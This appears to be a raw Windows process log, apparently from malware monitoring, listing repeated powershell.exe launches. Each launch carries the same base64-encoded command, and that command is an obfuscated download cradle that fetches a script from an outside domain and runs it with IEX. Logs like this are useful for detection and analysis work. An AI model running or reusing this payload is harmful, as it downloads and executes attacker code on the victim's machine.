"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
203
6016
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
204
6528
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
205
6740
powershell.exe
3036
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
206
6596
powershell.exe
3440
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
207
6584
powershell.exe
3200
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
208
6800
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
209
6836
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
210
6432
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
211
6492
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
212
6636
powershell.exe
4484
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
213
6304
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
214
7276
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
215
7392
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
216
7424
powershell.exe
3836
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
217
7432
powershell.exe
3368
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
218
7460
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
219
7536
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
220
7588
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
221
7600
powershell.exe
1460
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
222
7668
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
223
7716
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
224
7776
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
225
7824
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
226
7880
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
227
7956
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
228
8064
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
229
8076
powershell.exe
3992
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
230
8084
powershell.exe
4716
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
231
8144
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
232
5632
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
233
7500
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
234
6736
powershell.exe
2880
powershell.exe
